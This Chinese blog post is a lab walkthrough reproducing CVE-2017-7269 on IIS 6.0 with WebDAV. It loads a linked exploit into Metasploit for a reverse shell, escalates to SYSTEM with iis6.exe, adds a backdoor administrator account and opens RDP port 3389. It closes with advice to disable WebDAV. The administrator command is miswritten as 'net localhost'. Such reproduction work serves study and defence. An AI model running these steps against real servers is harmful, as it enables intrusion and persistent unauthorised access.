当前位置:   article > 正文

IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记

cve-2017-7269

一、漏洞描述

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。

二、影响版本以及利用条件

Windows 2003 R2开启WebDAV服务的IIS6.0

三、漏洞环境搭建

Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
Exp下载地址:https://github.com/zcgonvh/cve-2017-7269
IIS6.exe提权工具
3389.bat

四、漏洞复现

1.IIS开启WebDAV
在这里插入图片描述
工具检测存在CVE-2017-7269漏洞
在这里插入图片描述

2.github下载exp

Exp下载地址:https://github.com/zcgonvh/cve-2017-7269

3.把exp放入到msf中,#注意模块的命名名称,单词之间加下划线

这个地方有个坑,下载的exp:cve-2017-7269 直接放在metasploit中是不能加载识别的,得把cve-2017-7269修改为cve_2017_7269
将桌面上的cve_2017_7269.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/iis/目录下
命令:cp /root/桌面/cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

给cve_2017_7269.rb执行权限
在这里插入图片描述
打开metasploit重新加载exp模块,加载完模块之后,exp数量会增加1
在这里插入图片描述
4.使用模块,设置参数
在这里插入图片描述
设置参数模块如下设置即可
忘记截图了一个,还有一个命令:set lhost 192.168.36.129(kali地址)
在这里插入图片描述
返回shell,查看当前用户权限,发现是一般用户权限
在这里插入图片描述
cd到网站目录,寻找一个可以创建文件夹的目录,一个一个寻找
在这里插入图片描述
按Ctrl + C退出shell,输出y
在这里插入图片描述

利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
在这里插入图片描述
又回到shell里面确定工具上传是否成功
在这里插入图片描述

在这里插入图片描述
利用工具进行提权,命令:iis6.exe “whoami”,已经是system权限了
在这里插入图片描述
进行新建用户,iis6.exe “net user xiaohua xiaohua123 /add”
在这里插入图片描述
添加用户到管理员,iis6.exe “net localhost administrators xiaohua /add”
在这里插入图片描述
查看远程连接是否打开,没有打开,命令:netstat -an
在这里插入图片描述
再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)

命令:iis6.exe “3389.bat”
在这里插入图片描述
查看是否打开,netstat -an,已经成功打开
在这里插入图片描述
进行远程连接
在这里插入图片描述

五、修复建议

禁用WebDAV

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/1003652
推荐阅读
相关标签
  

闽ICP备14008679号